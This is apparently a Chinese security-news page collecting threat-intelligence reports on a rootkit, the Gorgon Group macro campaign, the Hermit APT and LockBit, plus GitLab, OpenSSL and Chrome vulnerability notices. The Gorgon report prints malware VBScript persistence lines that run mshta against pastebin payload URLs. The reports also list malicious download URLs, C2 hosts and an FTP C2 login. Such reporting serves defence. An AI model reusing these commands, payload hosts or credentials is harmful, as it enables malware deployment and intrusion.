标签: 网络安全

GitLab 向报告远程代码执行漏洞的研究员奖励 2 万美元

GitLab 向报告自家平台的严重远程代码执行漏洞的安全研究人员奖励了 2 万美元。该漏洞由 William “vakzz” Bowling 发现,Bowling 既是一名程序员同时也是 Bug 赏金猎人,他于3月23日通过 HackerOne Bug 赏金平台私密披露了该漏洞。 Bowling 表示,GitLab 的 UploadsRewriter 函数用于拷贝文件,而这正是此次严重安全问题的源头。当 issue 被用于跨项目复制时,UploadsRewriter 函数会检查文件名和补丁。然而在这过程中由于没有验证检查,导致出现路径遍历问题,这可能会被利用于复制任何文件。 根据 Bug 赏金猎人的说法,如果漏洞被攻击者利用,则可能会被用于”读取服务器上的任意文件,包括 token、私有数据和配置”。GitLab 实例和 GitLab.com 域均受到该漏洞的影响,此漏洞被 HackerOne 判定为严重等级程度。 Bowling 补充到,通过使用任意文件读取漏洞从 GitLab 的 secret_key_base 服务中抓取信息,可以将该漏洞变成远程代码执行(RCE)攻击。举例来说,如果攻击者改变了自己实例的 secret_key_base 以匹配项目,那么 cookie 服务也可以被操纵以用于触发 RCE 攻击。 Bowling 将漏洞发送给了 GitLab 安全团队,工程师们重现了此问题,并指出攻击者至少需要成为项目成员才能利用该漏洞,但根据 GitLab 高级工程师 Heinrich Lee Yu 的说法,攻击者也可以”创建自己的项目或组别来达到同样的目的”。 目前,该漏洞已经在 GitLab 12.9.1 版本中得到了解决,安全研究人员 Bowling 也于3月27日获得了全额赏金。   (稿源:开源中国,封面源自网络。)

UU 页游助手升级通道传播独狼 Rootkit 病毒,已感染上万台电脑

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/MchLCxba26Z0KMZthv-uLA 一、概述 腾讯安全威胁情报中心检测发现,UU页游助手通过其软件升级通道,传播独狼Rootkit病毒。独狼Rootkit家族是一个长期依赖第三方Ghost镜像传播的恶性锁主页后门病毒。本次由于通过借助UU页游助手推广渠道流氓传播,使得独狼Rootkit病毒在短时间内感染量激增,受害网民已过万,分布在全国各地。中毒电脑会出现莫名其妙安装不请自来的软件、频繁弹出广告、浏览器主页被锁定等现象。 二、病毒分析 UU页游助手安装完毕后,会在安装目录内安装名为PopTip.exe的模块,该模块负责与hxxp://update.uuyyzs.com/query_action.php页面通信。 PopTip.exe模块负责拉取弹窗广告信息、托盘广告信息、升级信息等,例如下图中从云端拉取的Mini页信息。 由于广告窗口没有显示厂商标识,没有广告来源信息,该软件在系统托盘区闪动消息提示,点击后会自动创建桌面页游图标,这些行为令用户十分反感。而PopTip.exe模块提供的升级功能,较多使用了流氓手段恶意推广安装,其中甚至包含病毒木马文件。 PopTip.exe模块通过“虚假更新提示”的弹出框恶意推装用户不需要的软件:该窗口右上角的关闭按钮,无论如何点击均无法关闭,该弹出框强迫用户点击升级完成按钮。该窗口还默认勾选两个文字描述模糊,颜色极浅的可选项。放大图片发现分别为亿迅图片转换器和数据优化。用户点击完成,UU游戏助手则进行全程静默安装行为。 当前版本的poptip.exe模块通过以下两个地址,拉取推装程序到Roaming目录静默安装执行: hxxp://www.fikuu.com/app/YXConvert_105301.exe(亿迅图片转换器) Hxxp://www.jia7788.top:7788/new/a109.exe(数据优化服务:实际为病毒文件) a109.exe模块会判断当前系统内是否包含安全软件的进程,当进程存在则向其窗口发送WM_QUIT尝试退出相关进程,同时该模块通过拉起系统svchost.exe作为傀儡进程执行恶意代码,释放随机名的驱动程序。或下载执行xww999.exe执行释放随机名驱动程序,将独狼Rootkit模块植入到系统内。 独狼Rootkit病毒,该病毒的特点之一是通过创建Minifilter文件过滤系统,用户使用系统文件管理器就会发现Drivers目录不可见,同时将所有访问病毒驱动随机名母体文件的请求重定向到系统acpi.sys文件。意思是,当你试图查看那些莫名其妙进来的随机文件名驱动文件时,你看到的实际是acpi.sys。 独狼Rootkit模块最终通过插APC的方式向浏览器进程注入恶意代码达到主页劫持、后门代码驻留等恶意行为。 独狼rootkit病毒会向浏览器进程注入恶意代码,实现劫持浏览器启动命令行,达到主页劫持的目的。 分析发现,当前主页配置信息暂未下发,病毒暂未执行锁定用户浏览器主页的能力。推测当前病毒处于投递扩散期,保留了部分恶意行为暂不执行,当其感染量到达一定程度时,再随时下发劫持指令,实现浏览器劫持功能。 独狼Rootkit病毒可劫持数十款主流浏览器软件,包括IE、Chrome及其他国内用户常见的浏览器等等: 以插apc的方式向浏览器注入恶意代码: 我们通过对该病毒以往版本的分析,知道该病毒可以简单修改或升级配置,实现对浏览器主页的锁定功能,通常会将浏览器主页劫持到带推广id的2345广告站点。 当前病毒配置 简单构造病毒劫持配置文件desktop.ini 打开浏览器主页发现主页已被劫持到指定地址: 三、解决方案及安全建议 网上各种小众工具软件分发渠道良莠不齐,不少软件下载站暗藏玄机,很容易下载安装不需要的软件,甚至部分软件下载站还会推广危害严重的勒索软件。腾讯安全专家建议用户尽可能从相应软件的官方网站下载软件,或者通过腾讯电脑管家的软件管理功能下载需要的软件,启用腾讯电脑管家的权限雷达,帮助过滤软件包中存在的静默安装、恶意弹窗,管理开机自动运行等有损用户体验的情况发生。 腾讯电脑管家查杀UU页游助手 管家急救箱清理独狼Rootkit木马 IOCs MD5: 717d43d175430844467993ac4834396f 21a9876550dcebe12df9ec1011a01035 75f39f61ecc20a088766eb319d1ec9e2 7652ad8e2c69bef67c786eff3e9e3ef3 51991e47adb0b9160f077a0fc722f115 238b0180e66d16309efe50143b46560d 94f31a6d0d3243811705e0c9796cf060 8ec5ee614f76d0c547e2b76a52e8dae2 1374c22e5c861813c82bf6a1c8c159f9 Domain: www.jia7788.top update.uuyyzs.com URL hxxp://update.uuyyzs.com/query_action.php(UU页游助手云控地址) Hxxp://www.jia7788.top:7788/new/a109.exe(独狼病毒母体投递地址)

收到“订单、付款收据、分析报告”PPT,请勿打开,为Gorgon Group黑客组织投递的攻击邮件

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Td6zdGxeOjKEh3nu-vAGdw 一、背景 近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码,宏代码会启动mshta执行保存在pastebin上的远程脚本代码,且pastebin URL是由Bitly生成的短链接。 此次攻击的主要特点为恶意代码保存在托管平台pastebin上:包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马,然后将其注入指定进程执行,RAT会不定期更换,当前获取的RAT 木马是Azorult窃密木马。 对比分析发现,攻击者注册的pastebin账号为”lunlayloo”( 创建于2019年10月),与另一个账号“hagga”(创建于2018年12月)对应攻击事件中使用的TTP高度相似,因此我们认为两者属于同一家族ManaBotnet,并且”lunlayloo”可能为“hagga”的后继者。 有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group,一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击,包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。 Manabotnet攻击流程 二、详细分析 初始攻击以PPT文档为诱饵,使用的文件名有“SHN FOODS ORDER.ppt”、“PrivateConfidential.ppt”、“Analysis Reports.ppt”、“Order001.ppt”、“payment_receipt.ppt”,邮件主题为Analysis Reports From IDS Group(来自IDS Group的分析报告 )、Analysis Reports From NHL – Nam Hoang Long Co.,Ltd(来自NHL公司的分析报告)、Purchase Order2020(2020采购订单)、payment_receipt.ppt(付款收据)等。 Analysis Reports.ppt中包含恶意的VBA宏代码。 如果用户选择启用宏,则会执行命令: `mshta https[:]//j.mp/ghostis61hazsba` 远程代码URL是短链接,还原为https[:]//pastebin.com/raw/FssQ8e8e,恶意代码被保存在托管平台pastebin.com。 以同样方式投递的文档SHN FOODS ORDER.ppt中的宏执行的恶意代码为,https[:]//j.mp/ghjbnzmxc767zxg,短链接还原得到https[:]//pastebin.com/raw/RCd2CLNd,该地址的托管恶意代码页面如下: 通过浏览器的调试功能对该代码进行编码转换可得到VBScript代码: 该代码加入了一些字符反转和字符连接操作,以逃避恶意代码检测,然后执行5个操作进行持久化: 1.创建计划任务“Murtaba”,每80分钟运行一次远程hta脚本; 2.执行一次hta脚本; 3.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2下写入执行hta脚本的命令; 4.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3下写入执行hta脚本的命令; 5.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\中写入执行hta脚本的命令。 `CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn ““Murtaba”” /tr ““\”“&` `CreateObject(“WScript.Shell”).Run “””mshta”””“http:\\pastebin.com\raw\B7f3BpDk”“”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\eMse7spS”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\hxKddkar”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\”, ““”m” + “s” + “h” + “t” + “a“”””http:\\pastebin.com\raw\v2US1QAY”””, “REG_SZ”` 在计划任务中指定执行的远程hta脚本均https[:]\\pastebin.com\raw\B7f3BpDk,解码为以下文本,同样是一段VBScript代码,在其中以隐藏的方式执行Powershell,首先通过ping google.com测试网络是否连通,然后下载Powershell脚本https[:]//pastebin.com/raw/8ZebE1MG进行base64解码并执行。 计划任务执行的Pastebin保存的VBScript脚本: VBScript通过Powershell执行Pastebin保存的以base64编码的Powershell脚本: Base64解码后: Powershell代码将一个压缩包文件的二进制数据以硬编码形式进行保存,使用时首先将“!”替换为“0x”去除混淆,然后通过IO.MemoryStream将数据读取到内存,最后再使用IO.Compression.GzipStream进行解压,就可以获得一个以.Net编写的DLL并通过Reflection  加载执行: $t=[System.Reflection.Assembly]::Load($decompressedByteArray); Powershell获取的另一个PE直接保存了二进制编码在pastebin的URL(https://pastebin.com/raw/f9c50ewQ)上,使用时首先将‘T_B’替换为‘0x’,在分析过程中发URL被动态更换为了:https://pastebin.com/raw/EmyvkN6m,使用时将“^^_^^”替换为“0x”,还原得到PE文件后,将其注入到notepad.exe的内存中执行: [Givara]::FreeDom(‘notepad.exe’,$Cli2)  https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m .NET编写的DLL名为Apple.dll,入口调用Fuck.FUN,Fuck.FUN随后启动记事本,掏空现有部分的映射,在记事本进程中分配一个新的缓冲区,向该进程中写入有效负载,然后继续执行线程。这样使得攻击者无需将恶意软件写入磁盘,通过计划任务可定期获取注射器(一段攻击代码,用来将RAT注入其他程序)和RAT,并将RAT注入指定进程的内存中执行。 当前作为Payload被下载执行的是Azorult木马,一种使用Delphi编写的窃密木马变种。Azorult已在俄罗斯论坛上出售,价格最高为100美元。 Azorult窃密木马的大多数功能是获取可以在受害者计算机上找到的各类账号密码,例如,电子邮件帐户,通信软件(例如pidgin、 psi+,、telegram),Web Cookie,浏览器历史记录和加密货币钱包,同时该木马还具有上载和下载文件以及截屏的功能。 三、团伙分析 攻击者使用第三方网站(例如Bitly,Blogspot和Pastebin)可能是为了逃避检测,因为这些网站不会被网络防御方判断为恶意网站。但是,诸如Bitly和Pastebin之类的网站会记录访问某个链接的次数。我们能够确定是谁创建了此Pastebin帖子,并统计该链接被访问了多少次。 例如,从页面可以看到托管“Apple.dll”样本的URL已被查看12000多次。这表明有12000台计算机受此攻击影响。但是,由于攻击者使用的是已知的RAT木马,因此实际受影响的计算机数量可能会少得多,因为许多计算机可能已安装了杀毒软件。 “lunlayloo”在2020年3月30日上传的恶意代码,该账户创建于2019年10月23日。 lunlayloo在2020年4月21日上传的恶意代码,托管“Azorult Rat”,由于最近才更新,被查看只有77次。 分析时发现攻击Azorult Rat回传数据对应的URL为: http[:]//23.247.102.120/manabotnet-work/index.php 该URL中包含的“manabotnet”与另一安全公司发现的Pastebin帖子标题:“ MasterManabots-all-bots”相同,该攻击者的Pastebin账号名称为“hagga”,于2018年12月3日创建,另外由于两次攻击使用的TTP高度相似性,所以我们认为他们属于同一家族ManaBots。   unit42在2019年4月对Pastebin账号“HAGGA”发起的攻击活动进行了详细的分析,基于高水平的TTP,包括使用RevengeRAT,unit42认为其与Gorgon Group组织有关。 (https[:]//unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/) 2019年1月腾讯安全御见威胁情报中心也捕获到疑似来自Gorgon Group组织相关的攻击,)(https[:]//www.freebuf.com/column/193603.html),该攻击以“订单”、“支付详单”等主题的钓鱼邮件针对全球的外贸人士进行攻击,行为类似于腾讯安全威胁情报中心多次披露的”商贸信”,攻击者使用blogspot的订阅功能来保存恶意代码。 综合分析以上几次攻击行动,总结该团伙攻击对应的ATT&CK矩阵对应如下,共涉及约44个TTP技术: Initial Access(初始攻击) T1193 Spearphishing Attachment Execution(执行) T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1064 Scripting T1127 Trusted Developer Utilities Persistence(持久化) T1060 Registry Run Keys / Startup Folder T1053 Scheduled Task Privilege Escalation(权限提升) T1055 Process Injection T1053 Scheduled Task Defense Evasion(防御逃逸) T1140 Deobfuscate/Decode Files or Information T1143 Hidden Window T1170 Mshta T1027 Obfuscated Files or Information T1093 Process Hollowing T1055 Process Injection T1064 Scripting T1127 Trusted Developer Utilities T1102 Web Service Credential Access(凭证获取) T1503 Credentials from Web Browsers T1081 Credentials in Files T1214 Credentials in Registry T1539 Steal Web Session Cookie Discovery(数据发现) T1083 File and Directory Discovery T1012 Query Registry T1518 Software Discovery T1082 System Information Discovery T1007 System Service Discovery Collection(数据采集) T1123 Audio Capture T1119 Automated Collection T1115 Clipboard Data T1213 Data from Information Repositories T1005 Data from Local System T1039 Data from Network Shared Drive T1074 Data Staged T1056 Input Capture T1185 Man in the Browser T1113 Screen Capture T1125 Video Capture Command and Control(命令和控制) T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1132 Data Encoding T1001 Data Obfuscation T1219 Remote Access Tools T1105 Remote File Copy T1102 Web Service Exfiltration(数据窃取) T1022 Data Encrypted T1041 Exfiltration Over Command and Control Channel 其中具有该团伙的代表性的TTP技术点为: T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder T1093 Process Hollowing T1055 Process Injection T1102 Web Service 在T1102 Web Service技术上,该团伙经常使用的合法外部Web服务为Bitly、Blogspot和Pastebin,这个技术在ATT&CK矩阵中战术条目中同时属于Defense Evasion(防御逃逸)和Command and Control(命令和控制),在具体攻击过程中体现在可以绕过恶意网址检测,以及可以通过修改托管网站上的URL对应的内容动态控制下载的恶意代码。 四、安全建议 Gorgon Group为专业黑客组织,擅长攻击大型企业、行业及政府背景的机构,腾讯安全威胁情报中心推荐相关单位采用腾讯安全完整解决方案提升系统安全性,防止专业黑客的攻击。 IOCs Md5 417eef85b7545b13cb2a5b09508a9b8a cd425ac433c6fa5b79eecbdd385740ab f4479c5553271402ab4ff9a55584a9fd URL http://23.247.102.120/manabotnet-work/index.php 短链接: https[:]//j.mp/ghjbnzmxc767zxg https[:]//j.mp/hdjas6782vnavx https[:]//j.mp/dhajsk67a8sdg https[:]//j.mp/ahjkads78dasa https[:]//j.mp/hdajks6786sa https[:]//j.mp/dbashgdyt23vb Pastebin https[:]//pastebin.com/raw/8ZebE1MG https[:]//pastebin.com/raw/FssQ8e8e https[:]//pastebin.com/raw/RCd2CLNd https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m https[:]//pastebin.com/raw/B7f3BpDk https[:]//pastebin.com/raw/eMse7spS https[:]//pastebin.com/raw/hxKddkar https[:]//pastebin.com/raw/v2US1QAY 参考链接 https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ https://www.freebuf.com/column/193603.html

Hermit(隐士)APT 组织 2020 年最新攻击活动分析

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Gukd2lNr9lE8fluG4bFfSw 一、概述 两年前,腾讯安全威胁情报中心曝光了SYSCON/SANNY木马的活动情况,并且根据关联分析确定跟KONNI为同一组织所为。该组织的攻击对象包括与朝鲜半岛相关的非政府组织、政府部门、贸易公司、新闻媒体等。 SYSCON/SANNY木马是一个非常有特色的远程控制木马,通过ftp协议来进行C&C控制,该后门的主要攻击目标为朝鲜半岛相关的重要政治人物或者要害部门,偶尔也会针对东南亚等国进行攻击。该活动自2017年下半年开始活跃,并且对多个目标进行了攻击活动。被曝光后,该组织活动没有任何减弱的迹象。腾讯安全威胁情报中心根据该组织的特点,在2018年12月将其命名为“Hermit(隐士)”。 2020年,“Hermit(隐士)”APT组织依然保持较高的活跃度,攻击方式和木马行为上也有了较大的更新,因此我们对近期的攻击活动做一个整理,并对木马的一些更新情况做一个详细分析汇总。 二、诱饵 使用带有恶意Office宏代码的攻击诱饵依然是SYSCON/SANNY最常用的攻击方式,此外通过修改字体颜色来伪装宏代码的恶意行为也是该组织的特点之一,该特点一直保持至今。而诱饵的主题依然是紧贴时事热点,尤其是全球新冠疫情(COVID-19)热点以及朝鲜半岛相关的局部热点事件。 例如3月份“Hermit(隐士)”组织使用“口罩仅建议用于照顾COVID-19病人的人使用”的文档标题作为攻击诱饵。 “Hermit(隐士)”使用新冠疫情(COVID-19)口罩话题为诱饵 “Hermit(隐士)”组织使用2020年东京残奥会捐助相关的诱饵  “Hermit(隐士)”组织伪装成2020年朝鲜政策相关话题为诱饵  “Hermit(隐士)”组织使用朝鲜Covid-19疫情相关主题为诱饵 三、恶意宏代码分析 携带恶意宏代码的恶意Office文件几乎是该组织的唯一攻击方式,多数诱饵会在未启用宏的情况下在诱饵文件中显示诱导内容,诱导用户启用宏,在未启用宏的情况下字体为几乎无法查看的灰色。 诱导受害者启用恶意宏代码查看文档 多数诱饵的vba宏代码使用密码保护 宏代码中会调整图片大小以及修改字体颜色,用来隐藏真实的恶意行为 最新的攻击宏代码主要恶意行为是释放一个PE文件,并创建进程执行,执行时会将配置的CC信息作为命令行参数传递给恶意进程。 释放PE文件相关宏代码之一 释放PE文件相关宏代码之二 四、downloader&install过程分析 释放出的PE文件是一个downloader木马,其主要功能是从命令行参数中提取URL,并进行一系列的下载、解压和安装行为,以下以最新版本的文件up.exe(a83ca91c55e7af71ac4f712610646fca)作为样本进行详细分析。 up.exe行为 1)首先从参数中取出URL,然后判断操作系统是32位还是64位,如果32位则下载2.dat、64位下载3.dat下载完成后将其解密成temp.cab,随后执行expand命令对cab进行解压释放 downloader主要功能函数 2)cab内容如下,主要包含一个安装bat文件、一个RAT dll文件、一个ini文件 cab压缩包内容 3)检查当前进程权限,不同权限不同处理方式 进程权限检测相关代码 4)如果不是TokenElevationTypeLimited权限,即管理员用于以非管理员权限运行程序,则直接winexec执行install.bat,如果是TokenElevationTypeLimited则判断cmd.exe的版本,根据版本不同执行不同的UAC bypass策略,共内置了三种绕过UAC的方式。 根据cmd版本信息使用不同的UAC bypass方案 5)UAC bypass方式一相关代码 UAC bypass方式一 6)UACbypass方式二相关代码 UAC bypass方式二 7)UAC bypass方式三相关代码 UAC bypass方式三 8)install.bat的功能就是将wprint.dll和wprint.ini复制到system32目录,并创建服务持久化dll install.bat 五、RAT行为详细分析 1,首先判断目录下是否有dll同名的dat文件,如果有则读取并解密出配置信息,如果没有则读取同名的ini文件,即wprint.ini并解密,解密得到URL后进行不断尝试下载dat 解密ini获取url下载dat相关代码 2、wprint.ini解密结果如下:是一个url,使用URLDownloadToFile进行下载后存为wprint.dat 解密后的ini内容 3)读取wprint.dat并解密,得到包括ftpserver、username、password在内的配置信息 从dat从提取配置信息相关代码 4)根据配置信息连接ftpserver,并将server上的htdocs设置为当前目录,在其中创建一个以本地computername加密后的字符串为名称的新目录 连接ftpserver、创建目录相关代码 5)先后执行cmd /c systeminfo > temp.ini、cmd /c tasklist > temp.ini两个命令收集计算机信息和进程列表,加密上传temp.ini文件到ftpserver并以ff mm-dd hh-mm-ss.txt的时间格式命名。 执行命令获取信息相关代码 6)ftp上传文件相关代码,除了.cab、.zip、.rar外的其他扩展名文件均会被压缩成.cab后加密上传 上传信息、文件相关代码 7)依次下载ftpserver上的cc(x)文件到本地解析指令进行命令分发,x为从0开始依次自增的整数 获取控制指令相关代码 获取控制指令相关代码 8)命令文件格式为开头“#”字符与第二个“#”之间的为下发的文件内容,第二个“#”之后的为指令内容 解析控制文件cc相关代码 9)控制指令列表如下:主要完成cmdshell和文件上传下载执行的功能 10)cmd /c指令相关处理代码如下 cmd命令相关代码 11)/user指令相关处理代码如下 user命令相关代码 12)其他指令处理代码如下 其他命令相关处理代码 六、版本变化 SYSCON/SANNY的活动最早可追溯到2017年,使用ftp协议作为RAT控制协议的木马是该组织最早使用也是最长使用的手法,与之前版本的木马相比,近期攻击所使用的木马有以下升级点: 七、安全建议 腾讯安全威胁情报中心建议我国政府机关、重要企业、科研单位对APT攻击保持高度警惕,可参考以下建议提升信息系统的安全性: 1、建议重要机构网管培训工作人员不要随意打开不明来源的邮件附件,在邮件目的及发件人均未知的情况下,建议不要访问附件。 2、建议企业用户使用腾讯T-Sec终端安全管理系统修补漏洞,及时安装系统补丁,可减少被漏洞攻击的风险。同时注意打开Office文档时,避免启用宏代码。 3、推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客攻击行为进行检测。 八、附录 IOCs HASH: guidance.doc: 677e200c602b44dc0a6cc5f685f78413 123.doc: 40e7a1f37950277b115d5944b53eaf3c Keep an eye on North Korean cyber.doc: 1a7232ef1386f78e76052827d8f703ae Kinzler Foundation for 2020 Tokyo Paralympic games.doc: faf6492129eeca2633a68c9b8c2b8156 ce26d4e20d936ebdad92f29f03dfc1d9 7e71d5a0f1899212cea498bbda476ce8 a83ca91c55e7af71ac4f712610646fca 77f46253fd4ce7176df5db8f71585368 62e959528ae9280f39d49ba5c559d8fb C2: phpview.mygamesonline.org firefox-plug.c1.biz win10-ms.c1.biz ftpserver:myview-202001.c1.biz username:3207035 password:1qazXSW@3edc 参考链接 https://mp.weixin.qq.com/s/rh4DoswLUNkS8uiHjrFU9A https://mp.weixin.qq.com/s/CBh2f-lfG5H4wcoj5VSfEw https://mp.weixin.qq.com/s/F2-DLtuHUkV_nCnKwp44_Q

lockbit勒索病毒通过RDP弱口令爆破攻击,已有企业用户中招

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/4j0dps2b-y4HIudZ1tNJRg   一、概述 腾讯安全威胁情报中心检测到国内有企业遭受lockbit勒索病毒攻击,被加密破坏的文件添加了.Lockbit后辍。该病毒出现于2019年末,传播方式主要利用RDP口令爆破。该病毒此前主要活跃在国外,观察当前病毒版本,其进程结束(防文件占用)列表内已出现国产安全软件,这也代表着该病毒团伙已将其狩猎范围拓展到了国内。 经分析,该病毒使用RSA+AES算法加密文件,加密过程采用了IOCP完成端口+AES-NI指令集提升其病毒工作效率,从而实现对文件的高性能加密流程。由于该病毒暂无有效的解密工具,被攻击后无法恢复文件,所以我们提醒各政企机构提高警惕。 二、分析 为了提升病毒读写文件效率,病毒通过采取IOCP完成端口模型,后续在工作者线程内读取完成消息队列,使用异步读写文件的方式实现病毒加密文件过程的高性能化。 在工作者线程内处理完成队列消息,根据IOCP_QUEUE_COMPLETECODE对文件数据进行加密,读写消息再投递。 同时为了进一步提升病毒加密过程效率,病毒运行后会检查CPU判断是否支持AES-NI指令集,加密时若支持相关指令则使用 aeskeygenassist,aesenc等加解密专用指令完成AES加密流程,否则使用其它常用计算指令完成加密流程。 加密文件前病毒会首先本地生成RSA密钥对信息,使用硬编码的RSA(N,E)对其进行加密,加密后的信息作为用户ID信息保存在相关注册表LockBit位置full键值内,同时将本地生成RSA密钥对中的RSA公钥(N,E)信息明文方式保存到注册表相关Pulbic位置内。被加密文件将添加0x610字节附加数据,分别为0x100字节的被加密AES密钥信息,0x500字节被加密用户RSA密钥信息,0x10固定串信息。 硬编码的RSA(N,E)信息,无私钥情况无法解密full内容,也无法解密文件 病毒会对每个文件使用BCryptGenRandom或CryptGenRandom方式生成0x16字节的AES密钥,随后开始尝试对文件进行加密。 当无法访问文件时,病毒会尝试更改文件所有者为自身进程,再次尝试访问文件。同时会尝试结束大量数据占用进程和服务(其内包括了国产安全软件相关进程,文档保护相关进程),加密时会避开大量系统关键目录,大量非数据类型后缀的文件。 病毒不加密以下白名单相关的文件和文件夹: 该病毒还会嗅探局域网内主机135,445端口是否开放,如果开放则尝试遍历其主机内的共享资源进行加密 加密文件结束后,文件均被添加.lockbit扩展后缀。由于病毒同时会删除系统卷影备份信息,被加密后无法通过磁盘恢复等方式找回文件。同时该病毒还会修改桌面壁纸显示勒索信息,留下名为Restore-My-Files.txt的勒索信,要求用户登录暗网缴纳赎金,之后获取解密工具,对应暗网地址则提供了文件试用解密功能,聊天购买解密工具议价等服务。 三、安全建议 企业用户: 1、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。 3、采用高强度的密码,避免使用弱口令密码,并定期更换。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。网管可通过强制安全策略要求局域网所有服务器、终端系统使用强密码并设定密码过期策略。 4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据(数据库等数据)进行定期非本地备份。 6、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码。 7、在终端/服务器部署腾讯T-Sec终端安全管理系统,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务平台,内网各节点漏洞应及时进行漏洞扫描修复。 8、使用腾讯T-Sec终端安全管理系统(腾讯御点,产品官网:https://s.tencent.com/product/yd/index.html)拦截病毒木马攻击。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户: 1、可启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码 2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。 IOCs MD5 b65198ea45621e29ba3b4fbf250ff686 d2e3b3cbdfd40e549c281b285c7fe9bd 553d21ec9c4e8a08d072e50f3ae0afe1 1f4581b36253f0f5d63e68347d1744a7 94d7e268d4a1bc11f50b7e493a76d7a0 49250b4aa060299f0c8f67349c942d1c d5c5558214a0859227e380071925ee58

OpenSSL 高危漏洞影响 OpenSSL 1.1.1 的多个版本

OpenSSL 项目发布安全公告称存在一个影响 OpenSSL 1.1.1d, 1.1.1e 和 1.1.1f 的高危漏洞 (CVE-2020-1967),该漏洞可被用于发起 DoS 攻击。根据官方对该漏洞的描述,在 TLS 1.3 握手期间或握手之后调用 SSL_check_chain() 函数的服务器或客户端应用可能会导致崩溃,原因是不正确处理”signature_algorithms_cert” TLS 扩展而引起的空指针引用。 如果从另一方接收到一个无效或未被识别的签名算法,则会发生崩溃。这可能会被恶意攻击者利用并发起 DoS 攻击。 该漏洞由 Bernd Edlinger 通过 GCC 中的新静态分析通道 -fanalyzer 发现,并已于2020年4月7日向 OpenSSL 报告。 对于受影响的 OpenSSL 1.1.1(1.1.1d,1.1.1e 和 1.1.1f)用户,建议尽可能快地升级到 1.1.1g。OpenSSL 1.1.1d 之前的版本不受此漏洞影响。 更早的版本如 OpenSSL 1.0.2 和 1.1.0 也均未受影响,不过这些版本都不再被支持,也无法再接受更新。建议使用这些版本的用户升级至 OpenSSL 1.1.1。   (稿源:开源中国,封面源自网络。)

谷歌发布 Chrome 紧急补丁 修复 CVE-2020-6457 关键漏洞

谷歌已经为Chrome浏览器发布了一个紧急修复补丁,并敦促用户尽快安装。谷歌并没有透露有关于CVE-2020-6457漏洞的更多信息,只是确认为“use after free”类型漏洞。 该漏洞是由Sophos公司的安全研究人员发现的,据说是一个远程代码执行(RCE)漏洞。该漏洞允许攻击者在受害者不知情的情况下运行命令和未受信任的脚本。 安全研究员Paul Ducklin在一篇博文中表示,该漏洞将允许黑客 “改变你的程序内部的控制流,包括转移CPU来运行攻击者刚刚从外部戳入内存的非信任代码,从而绕过任何浏览器通常的安全检查或’你确定吗’对话框。” 此外他还表示该漏洞影响广泛,包括Windows、macOS和GNU/Linux用户多达20亿用户都可能受到影响。因此在大部分用户都已经安装该更新之后谷歌可能会公布更多的细节。 如果你是Google Chrome浏览器用户,那么你应该确保你运行的是v81.0.4044.113或以上版本。你可以通过访问帮助关于Google Chrome浏览器,检查更新和安装的版本。   (稿源:cnBeta,封面源自网络。)

OpenSSL 曝出一个高危漏洞

